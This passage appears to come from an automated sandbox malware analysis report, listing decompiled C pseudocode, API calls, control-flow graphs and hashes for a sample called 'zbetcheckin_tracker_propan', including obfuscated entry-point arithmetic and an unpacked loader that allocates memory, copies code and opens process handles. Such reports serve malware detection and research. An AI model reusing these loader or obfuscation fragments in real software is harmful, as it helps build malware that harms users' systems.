      			}

      APIs
      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00418CB8,0000000C,0040FAA1,00000000,00000000), ref: 0040F9A0
      • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040F9C9
      • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040F9D9
      • InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB
        • Part of subcall function 0040D43F: EnterCriticalSection.KERNEL32(?,?,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 0040D467
        • Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 00410687
        • Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 00410694
        • Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106A1
        • Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106AE
        • Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106BB
        • Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106D3
        • Part of subcall function 00410678: InterlockedIncrement.KERNEL32(00000000), ref: 004106E3
        • Part of subcall function 00410678: InterlockedIncrement.KERNEL32(?), ref: 004106F7
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: IncrementInterlocked$AddressProc$CriticalEnterHandleModuleSection
      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
      • API String ID: 1110393133-2843748187
      • Opcode ID: 77a71c01ecdc6170047a1094652cba3ad19394436dc00ed2815630e6f4fa96c2
      • Instruction ID: fb9e327bc4e86ad3706c899d9e65884dd5987718e2b76837441fe1fa9022f41c
      • Opcode Fuzzy Hash: 77a71c01ecdc6170047a1094652cba3ad19394436dc00ed2815630e6f4fa96c2
      • Instruction Fuzzy Hash: CB115E71940705DFD720AF7AD845B9ABBE0AF48304F10853EE599A3691CB78A9448F68
      C-Code - Quality: 73%
      			E0040F850(intOrPtr _a4) {
      				intOrPtr _v0;
      				struct HINSTANCE__* _t6;
      				_Unknown_base(*)()* _t8;
      				intOrPtr _t9;
      				intOrPtr _t10;
      				void* _t12;
      
      				if(TlsGetValue( *0x42c494) == 0) {
      					L4:
      					_t6 = GetModuleHandleA("KERNEL32.DLL"); // executed
      					if(_t6 == 0) {
      						L8:
      						return _a4;
      					}
      					_t8 = GetProcAddress(_t6, "EncodePointer"); // executed
      					L6:
      					if(_t8 != 0) {
      						_t9 =  *_t8(_a4); // executed
      						_v0 = _t9;
      					}
      					goto L8;
      				}
      				_t10 =  *0x42c490; // 0x4
      				if(_t10 == 0xffffffff) {
      					goto L4;
      				}
      				_push(_t10);
      				_t12 =  *(TlsGetValue( *0x42c494))();
      				if(_t12 == 0) {
      					goto L4;
      				}
      				_t8 =  *(_t12 + 0x1f8);
      				goto L6;
      			}

      APIs
      • TlsGetValue.KERNEL32(00000000,0040F8BA,00000000,00412290,00000000,00000000,00000314,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F85D
      • TlsGetValue.KERNEL32(00000004,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F874
      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F889
      • GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F899
      • RtlEncodePointer.NTDLL(?,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F8A7
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Value$AddressEncodeHandleModulePointerProc
      • String ID: EncodePointer$KERNEL32.DLL
      • API String ID: 3030820695-3682587211
      • Opcode ID: e1a1faa33349261d61b007e91c188944f8f97be2cb1367989c561306ed197f4b
      • Instruction ID: 213b198e5dd7e5a30d12bdbf8ad6a886c508e8041afcaa9b888406e698b6a230
      • Opcode Fuzzy Hash: e1a1faa33349261d61b007e91c188944f8f97be2cb1367989c561306ed197f4b
      • Instruction Fuzzy Hash: BDF054326042129EDA24FB35DC44EEB3EA4AF083947558476B818E2AF1DB38CC46CA5C
      C-Code - Quality: 73%
      			E0040F8BC(intOrPtr _a4) {
      				intOrPtr _v0;
      				struct HINSTANCE__* _t6;
      				_Unknown_base(*)()* _t8;
      				intOrPtr _t9;
      				intOrPtr _t10;
      				void* _t12;
      
      				if(TlsGetValue( *0x42c494) == 0) {
      					L4:
      					_t6 = GetModuleHandleA("KERNEL32.DLL"); // executed
      					if(_t6 == 0) {
      						L8:
      						return _a4;
      					}
      					_t8 = GetProcAddress(_t6, "DecodePointer"); // executed
      					L6:
      					if(_t8 != 0) {
      						_t9 =  *_t8(_a4); // executed
      						_v0 = _t9;
      					}
      					goto L8;
      				}
      				_t10 =  *0x42c490; // 0x4
      				if(_t10 == 0xffffffff) {
      					goto L4;
      				}
      				_push(_t10);
      				_t12 =  *(TlsGetValue( *0x42c494))();
      				if(_t12 == 0) {
      					goto L4;
      				}
      				_t8 =  *(_t12 + 0x1fc);
      				goto L6;
      			}

      APIs
      • TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
      • TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
      • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
      • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
      • RtlDecodePointer.NTDLL(?), ref: 0040F913
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Value$AddressDecodeHandleModulePointerProc
      • String ID: DecodePointer$KERNEL32.DLL
      • API String ID: 3637547452-629428536
      • Opcode ID: 9749bbe704b7cb80d8c031ef03dc7bf9db3eea0e1109e80d9884c7ba75715e9f
      • Instruction ID: b9744975f3327fb948e758a7dae8ca83f05080644b539119d46011b4a90124de
      • Opcode Fuzzy Hash: 9749bbe704b7cb80d8c031ef03dc7bf9db3eea0e1109e80d9884c7ba75715e9f
      • Instruction Fuzzy Hash: 81F05430604312AED730AB35EC54BAB3EA4AF443507148436B408E26F2CB38DC499A9C

      Control-flow Graph

      control_flow_graph 197 2d1d31-2d1d5e CreateWaitableTimerA 198 2d1eb9-2d1ebf GetLastError 197->198 199 2d1d64-2d1db1 call 2d9258 WaitForMultipleObjects 197->199 201 2d1ec1-2d1ec9 198->201 204 2d1e10 199->204 205 2d1db3-2d1db8 call 2d1cb6 199->205 207 2d1e12-2d1e18 204->207 212 2d1dbc-2d1dc1 205->212 209 2d1e28-2d1e2c 207->209 210 2d1e1a-2d1e22 HeapFree 207->210 209->207 211 2d1e2e-2d1e38 CloseHandle 209->211 210->209 211->201 213 2d1dd4-2d1ded call 2d1bb5 212->213 214 2d1dc3-2d1dca 212->214 217 2d1df2-2d1df6 213->217 214->213 215 2d1dcc 214->215 215->213 218 2d1e3d-2d1e43 217->218 219 2d1df8-2d1e03 217->219 220 2d1e45-2d1e4b 218->220 221 2d1e70-2d1e78 218->221 219->212 222 2d1e05-2d1e0e call 2d196e 219->222 220->204 223 2d1e4d-2d1e6e call 2d482d 220->223 224 2d1e7e-2d1eae _allmul WaitForMultipleObjects 221->224 222->204 223->224 224->212 230 2d1eb4 224->230 230->204
      APIs
      • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 002D1D52
      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 002D1DA7
        • Part of subcall function 002D1BB5: RtlAllocateHeap.NTDLL(00000000,00000800,002DA05C), ref: 002D1BCA
        • Part of subcall function 002D1BB5: HeapFree.KERNEL32(00000000,?,002DB2D0), ref: 002D1C21
        • Part of subcall function 002D196E: GetCurrentProcessId.KERNEL32(?,00000058,?,?,?,?,002DC65A,00000000,?,002DA05C,00000000,00000000), ref: 002D1A6F
        • Part of subcall function 002D196E: OpenFileMappingW.KERNEL32(00000004,00000000,?), ref: 002D1A92
        • Part of subcall function 002D196E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 002D1AA6
        • Part of subcall function 002D196E: CloseHandle.KERNEL32(00000000), ref: 002D1AB3
        • Part of subcall function 002D196E: lstrlenW.KERNEL32(00000000), ref: 002D1ABE
        • Part of subcall function 002D196E: CreateEventA.KERNEL32(002DB25C,00000001,00000000,00000000,002DC767,00000001), ref: 002D1B38
        • Part of subcall function 002D196E: WaitForSingleObject.KERNEL32(?,00007530), ref: 002D1B79
        • Part of subcall function 002D196E: CloseHandle.KERNEL32(?), ref: 002D1BA7
      • HeapFree.KERNEL32(00000000,?), ref: 002D1E22
      • CloseHandle.KERNEL32(?), ref: 002D1E32
        • Part of subcall function 002D482D: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4836
        • Part of subcall function 002D482D: Sleep.KERNEL32(0000000A,?,002D1DF2,00000002,?,?), ref: 002D4840
        • Part of subcall function 002D482D: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4873
      • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 002D1E7E
      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 002D1EA4
      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,002D1FF0,00000058,00000000), ref: 002D1EB9
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CloseHandleHeapWait$CreateCriticalFileFreeMultipleObjectsSection$AllocateCurrentEnterErrorEventLastLeaveMappingObjectOpenProcessSingleSleepTimerViewWaitable_allmullstrlen
      • String ID:
      • API String ID: 875881855-0
      • Opcode ID: ff24044520523e09cc845c5a91fd258499036c2ec552809de9fa06cd34f74af6
      • Instruction ID: a69fa4014c90cbb52908619821fd559f7684f9883e03a509923c2ada6329a22d
      • Opcode Fuzzy Hash: ff24044520523e09cc845c5a91fd258499036c2ec552809de9fa06cd34f74af6
      • Instruction Fuzzy Hash: D54196B2819215BFD7109F58DC88D6BB7EDFB48364F100B2FF994E22A0D7708D608A52

      Control-flow Graph

      control_flow_graph 231 2d3b0f-2d3b4e lstrcpyn 232 2d3b50-2d3b55 231->232 233 2d3b57-2d3b5d 232->233 234 2d3b61-2d3b65 232->234 233->234 235 2d3b5f 233->235 236 2d3b6b-2d3b6d 234->236 237 2d3b67-2d3b69 234->237 235->234 238 2d3c28 236->238 239 2d3b73-2d3b78 236->239 237->232 237->236 240 2d3c2f-2d3c36 238->240 241 2d3c1f-2d3c26 239->241 242 2d3b7e-2d3b82 239->242 241->240 242->241 243 2d3b88-2d3bb6 VirtualAlloc 242->243 244 2d3bb8-2d3bec call 2d286f 243->244 245 2d3c16-2d3c1d 243->245 248 2d3bff 244->248 249 2d3bee-2d3bfd memcpy 244->249 245->240 250 2d3c06-2d3c14 VirtualFree 248->250 249->250 250->240
      APIs
      • lstrcpyn.KERNEL32(00000000,002DA284,00000008,00000000), ref: 002D3B34
      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 002D3BAC
      • memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 002D3BF5
      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 002D3C0E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Virtual$AllocFreelstrcpynmemcpy
      • String ID: Sep 26 2018$pnls$pnls
      • API String ID: 2133416149-2631464443
      • Opcode ID: c68acc2944b33382f10104c00f91e0c4145db4eb7cb7313648c2f2e519116f82
      • Instruction ID: 5872e7781d825b0f0ce654a3e54c4805bacabf15444190a6e21c2d3356467cb9
      • Opcode Fuzzy Hash: c68acc2944b33382f10104c00f91e0c4145db4eb7cb7313648c2f2e519116f82
      • Instruction Fuzzy Hash: 4031C572A20205EBCB04DF94C985BAE77B1BF44704F14805BE9006F386C7B0EE54DB92
      C-Code - Quality: 100%
      			E00401120() {
      				signed char _v5;
      				intOrPtr _v12;
      				char _v14;
      				signed int _v20;
      				short _v24;
      				short _v28;
      				short _v36;
      				signed int _v48;
      				intOrPtr _v52;
      				signed int _v56;
      				signed int _v60;
      				signed int _v64;
      				signed short _v68;
      				signed int _v76;
      				signed int _v80;
      				signed int _v81;
      				signed short _v88;
      				signed short _v96;
      				signed char _v97;
      				signed short _v108;
      				signed short _v112;
      				char _v113;
      				intOrPtr _v124;
      				signed int _v126;
      				signed int _v132;
      				signed short _v136;
      				signed int _v137;
      				signed char _v145;
      				signed short _v152;
      				signed int _v156;
      				short _v160;
      				intOrPtr _v164;
      				intOrPtr _v168;
      				intOrPtr _v172;
      				signed int _v176;
      				intOrPtr _v184;
      				intOrPtr _v188;
      				signed int _v189;
      				intOrPtr _v196;
      				intOrPtr _v204;
      				short _v208;
      				intOrPtr _v212;
      				signed int _v216;
      				signed int _v224;
      				intOrPtr _v228;
      				signed char _v229;
      				intOrPtr _t122;
      				intOrPtr _t125;
      				intOrPtr _t155;
      				intOrPtr _t165;
      				intOrPtr _t170;
      				signed int _t187;
      
      				_v112 = 0xa;
      				_v145 = 0x21;
      				_v88 = 0x1d;
      				_v189 = 0x13;
      				_v212 = 0x11;
      				_v36 = 0x2d;
      				_v28 = 0x26;
      				_t122 =  *0x436054; // 0xffffd263
      				_t165 =  *0x42c00c; // 0xffffd2e0
      				_v36 = _t122 -  *0x42d02c ^ _t165 +  *0x436054;
      				 *0x43605c = 0;
      				_t125 =  *0x42d024; // 0x18f01f
      				_v160 = (_v81 & 0x000000ff) - _v124 + _t125 - 0x4f;
      				_v113 = (_v126 & 0x000000ff) + _v196 + 0x00000019 & 0x0000009a;
      				_v80 = 0x79;
      				_t170 =  *0x42c014; // 0x536cedcb
      				_v24 = _v156 - (_v137 & 0x000000ff) + _t170 - 0x22;
      				_v208 = _v81 & 0x000000ff ^ 0xffffffd2;
      				_v124 = _v48 - _v80 + 0x1b;
      				_v60 = _v224 + 0x26;
      				_v20 = (_v145 & 0x000000ff) + _v196 ^ _v5 & 0x000000ff;
      				_v52 = 0x4369a88;
      				_v56 = _v97 & 0x000000ff ^ _v60 - 0x00000048;
      				_v80 = _v168 + _v80;
      				_v204 = 0x6761e;
      				if(_v12 == 2) {
      					_v137 = (_v137 & 0x000000ff) + (_v112 & 0x5c ^ _v80);
      					_v137 = _v168 +  *0x436048 - _v184 - 0x3e;
      					_v188 = (_v189 & 0x000000ff) - _v60 - 0x61;
      				}
      				_v126 = 0x42 - _v172 + _v196 - (_v108 & 0x0000ffff) + _v156;
      				_v216 = _v164 -  *0x42c000 - 0x55;
      				_v14 = _v176 & 0x0000ffff | _v156 | 0x00000041 - _v80 + (_v81 & 0x000000ff);
      				if(_v52 >= _v204) {
      					_v228 = 0x8b - _v156;
      					_v216 = _v56 + 0x00000012 | _v224;
      					E004010A0(); // executed
      					_v14 = _v64 & 0x0000000a & _v48 - (_v229 & 0x000000ff);
      					_v64 = 0x5e - _v184 -  *0x42d030;
      					_v28 = _v48 ^ 0x00000062 ^ _v68 & 0x0000ffff;
      				} else {
      					_v160 = (_v152 & 0x0000ffff) + _v124 ^ _v48 + _v80;
      					if(_v80 < 0x1e) {
      						_v196 = _v156 + _v76;
      						_v216 = (_v137 & 0x000000ff) + _v228 +  *0x42c008;
      					}
      					_v189 = _v189 & 0x000000ff | _v196 + _v156 + _v124 + 0x00000054 ^ 0x00000045;
      					_v172 = _v156 - (_v136 & 0x0000ffff) + (_v132 & 0x0000ffff);
      					E00401000();
      					_v184 = 0x25 - _v212;
      					_v184 = 0x2c - _v80;
      					_v76 = _v168 + _v196;
      				}
      				_v176 = 0x0000004d - (_v88 & 0x0000ffff) &  *0x43604c;
      				_t187 =  *0x436048; // 0x0
      				_v76 = _t187 & _v60;
      				_t155 = _v184;
      				_v132 = (_v96 & 0x0000ffff) + _t155 - 0x3f;
      				return _t155;
      			}

      APIs
      • EntryPoint.ZBETCHECKIN_TRACKER_PROPAN ref: 00401372
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: EntryPoint
      • String ID: !$&$-$y
      • API String ID: 3225343992-3790517558
      • Opcode ID: f9377fc4e39bec81c7915a3e74f9403889ea3dd9e0ad58da6d78107a8ec7424b
      • Instruction ID: 9fc8b0546067b550273f9ce3cd18f708ea690dcf0da1e1c991df25e2bd460843
      • Opcode Fuzzy Hash: f9377fc4e39bec81c7915a3e74f9403889ea3dd9e0ad58da6d78107a8ec7424b
      • Instruction Fuzzy Hash: 38A1E734D04268CFDB28CFA9D990BACBBB1BF49305F0481DAD449A7356D7385A85CF19

      Control-flow Graph

      control_flow_graph 385 401da8-401dbe 386 401dc0-401de3 GetModuleHandleA GetProcAddress 385->386 387 401de5-401de7 385->387 386->387 388 401df7-401dfc 386->388 387->388 389 401de9-401df2 IsWow64Process 387->389 389->388 390 401df4 389->390 390->388
      C-Code - Quality: 58%
      			E00401DA8(void* __ecx) {
      				signed int _v8;
      				_Unknown_base(*)()* _t7;
      				signed int _t9;
      				struct HINSTANCE__* _t10;
      				intOrPtr _t14;
      
      				_t7 =  *0x4054c0;
      				_v8 = _v8 & 0x00000000;
      				_t14 =  *0x405474; // 0x8c
      				if(_t7 != 0) {
      					L2:
      					if(_t14 != 0) {
      						_t9 =  *_t7(_t14,  &_v8); // executed
      						if(_t9 == 0) {
      							_v8 = _v8 & _t9;
      						}
      					}
      					L5:
      					return _v8;
      				}
      				_t10 = GetModuleHandleA("KERNEL32.DLL"); // executed
      				 *0x4054c8 = _t10; // executed
      				_t7 = GetProcAddress(_t10, "IsWow64Process"); // executed
      				 *0x4054c0 = _t7;
      				if(_t7 == 0) {
      					goto L5;
      				}
      				goto L2;
      			}

      APIs
      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,0000000C,?,?,00401165,?,00000000), ref: 00401DC5
      • GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,00401165,?,00000000), ref: 00401DD6
      • IsWow64Process.KERNELBASE(0000008C,00000000,0000000C,?,?,00401165,?,00000000), ref: 00401DEE
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressHandleModuleProcProcessWow64
      • String ID: IsWow64Process$KERNEL32.DLL
      • API String ID: 1818662866-1193389583
      • Opcode ID: 705e8e67f85f64d29e37c7ea8968b63ce2edd5692bcb6fdcbfe67057fa657f0b
      • Instruction ID: 768899232a536f9eb576ec6d23ca53939a6d814219d7a5e069215039f3e37d53
      • Opcode Fuzzy Hash: 705e8e67f85f64d29e37c7ea8968b63ce2edd5692bcb6fdcbfe67057fa657f0b
      • Instruction Fuzzy Hash: D2F05E71910704EBDB40DBA4AE04BEB76F8EF44316B11017AEA09F3290E774EE409A5C

      Control-flow Graph

      control_flow_graph 391 2d102a-2d1044 HeapCreate 392 2d104e-2d1063 GetTickCount call 2d39ab 391->392 393 2d1046-2d1049 391->393 395 2d10d0-2d10d2 392->395 397 2d1065-2d106f call 2d3b0f 392->397 393->395 397->395 400 2d1071-2d1082 397->400 401 2d10a9-2d10ab 400->401 402 2d1084-2d10a7 GetModuleHandleA GetProcAddress 400->402 403 2d10bb-2d10bf 401->403 404 2d10ad-2d10b6 IsWow64Process 401->404 402->401 402->403 406 2d10cb call 2d1eca 403->406 407 2d10c1 403->407 404->403 405 2d10b8 404->405 405->403 406->395 407->406
      APIs
      • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002D1037
      • GetTickCount.KERNEL32 ref: 002D104E
        • Part of subcall function 002D39AB: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002D1061,?), ref: 002D39B3
        • Part of subcall function 002D39AB: GetVersion.KERNEL32 ref: 002D39C2
        • Part of subcall function 002D39AB: GetCurrentProcessId.KERNEL32 ref: 002D39D9
        • Part of subcall function 002D39AB: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 002D39F6
        • Part of subcall function 002D39AB: GetLastError.KERNEL32 ref: 002D3A15
        • Part of subcall function 002D3B0F: lstrcpyn.KERNEL32(00000000,002DA284,00000008,00000000), ref: 002D3B34
        • Part of subcall function 002D3B0F: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 002D3BAC
        • Part of subcall function 002D3B0F: memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 002D3BF5
        • Part of subcall function 002D3B0F: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 002D3C0E
      • GetModuleHandleA.KERNEL32(002DC09F,?,?,?), ref: 002D1089
      • GetProcAddress.KERNEL32(00000000,002DC8D6,?,?,?), ref: 002D109A
      • IsWow64Process.KERNELBASE(002DB208,?,?,?,?), ref: 002D10B2
        • Part of subcall function 002D1ECA: GetModuleHandleA.KERNEL32(002DC0EA), ref: 002D1ED5
        • Part of subcall function 002D1ECA: CoInitializeEx.OLE32(00000000,00000002), ref: 002D1F0C
        • Part of subcall function 002D1ECA: memset.NTDLL ref: 002D1FA7
        • Part of subcall function 002D1ECA: RtlInitializeCriticalSection.NTDLL(002DB29C), ref: 002D1FB8
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Process$CreateHandleInitializeModuleVirtual$AddressAllocCountCriticalCurrentErrorEventFreeHeapLastOpenProcSectionTickVersionWow64lstrcpynmemcpymemset
      • String ID:
      • API String ID: 2116652087-0
      • Opcode ID: ac3aa9f36e2d1d75f4e54b8cdec9973d6f0fb8a46685acac54687a069cbd3e53
      • Instruction ID: 5105787b374deee731210daf9d206e0ef6ec26b31b6e3ebc9d116b6f3dea671c
      • Opcode Fuzzy Hash: ac3aa9f36e2d1d75f4e54b8cdec9973d6f0fb8a46685acac54687a069cbd3e53
      • Instruction Fuzzy Hash: EE117331951246FBCB22AF61FC5CA6E7B65AB94792B208017FC04C6650D7718DB0CBA2

      Control-flow Graph

      control_flow_graph 409 40fd83-40fda4 410 40fdb3-40fdf0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 409->410 411 40fda6-40fda8 409->411 413 40fdf2-40fdf7 410->413 414 40fdf9-40fdfb 410->414 411->410 412 40fdaa-40fdb1 411->412 415 40fe13-40fe16 412->415 416 40fe04-40fe12 413->416 414->416 417 40fdfd-40fe02 414->417 416->415 417->416
      APIs
      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0040FDB8
      • GetCurrentProcessId.KERNEL32 ref: 0040FDC4
      • GetCurrentThreadId.KERNEL32 ref: 0040FDCC
      • GetTickCount.KERNEL32 ref: 0040FDD4
      • QueryPerformanceCounter.KERNEL32(?), ref: 0040FDE0
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
      • String ID:
      • API String ID: 1445889803-0
      • Opcode ID: a936f020e1cfd720c543ccf46e1433c11646bd832f7880de4412ed285693acb8
      • Instruction ID: 7599b5e67e7c0e06bf678f663d3460e7f34e71a3e9286964ff684c0be0f61bed
      • Opcode Fuzzy Hash: a936f020e1cfd720c543ccf46e1433c11646bd832f7880de4412ed285693acb8
      • Instruction Fuzzy Hash: F3113372D002249BDB209BB8D94869FB7B8AF0C355F950572D901F7261D6749D0586D8
      C-Code - Quality: 100%
      			E0040FD83() {
      				struct _FILETIME _v12;
      				signed int _v16;
      				union _LARGE_INTEGER _v20;
      				signed int _t14;
      				signed int _t16;
      				signed int _t17;
      				signed int _t18;
      				signed int _t22;
      				signed int _t24;
      				signed int _t33;
      
      				_t14 =  *0x42c4a0; // 0xe190ffa3
      				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
      				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
      				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
      					GetSystemTimeAsFileTime( &_v12); // executed
      					_t16 = GetCurrentProcessId();
      					_t17 = GetCurrentThreadId();
      					_t18 = GetTickCount(); // executed
      					QueryPerformanceCounter( &_v20); // executed
      					_t22 = _v16 ^ _v20.LowPart;
      					_t33 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
      					if(_t33 != 0xbb40e64e) {
      						if((0xffff0000 & _t33) == 0) {
      							_t22 = _t33 << 0x10;
      							_t33 = _t33 | _t22;
      						}
      					} else {
      						_t33 = 0xbb40e64f;
      					}
      					 *0x42c4a0 = _t33;
      					 *0x42c4a4 =  !_t33;
      					return _t22;
      				} else {
      					_t24 =  !_t14;
      					 *0x42c4a4 = _t24;
      					return _t24;
      				}
      			}

      APIs
      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0040FDB8
      • GetCurrentProcessId.KERNEL32 ref: 0040FDC4
      • GetCurrentThreadId.KERNEL32 ref: 0040FDCC
      • GetTickCount.KERNEL32 ref: 0040FDD4
      • QueryPerformanceCounter.KERNEL32(?), ref: 0040FDE0
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
      • String ID:
      • API String ID: 1445889803-0
      • Opcode ID: a936f020e1cfd720c543ccf46e1433c11646bd832f7880de4412ed285693acb8
      • Instruction ID: 7599b5e67e7c0e06bf678f663d3460e7f34e71a3e9286964ff684c0be0f61bed
      • Opcode Fuzzy Hash: a936f020e1cfd720c543ccf46e1433c11646bd832f7880de4412ed285693acb8
      • Instruction Fuzzy Hash: F3113372D002249BDB209BB8D94869FB7B8AF0C355F950572D901F7261D6749D0586D8

      Control-flow Graph

      C-Code - Quality: 100%
      			_entry_() {
      				void* _t1;
      				struct HINSTANCE__* _t2;
      				int _t4;
      				int _t6;
      
      				_t6 = 0;
      				_t1 = HeapCreate(0, 0x400000, 0); // executed
      				 *0x405440 = _t1;
      				if(_t1 != 0) {
      					_t2 = GetModuleHandleA(0); // executed
      					 *0x405484 = _t2; // executed
      					GetCommandLineW(); // executed
      					_t4 = E004010ED(); // executed
      					_t6 = _t4;
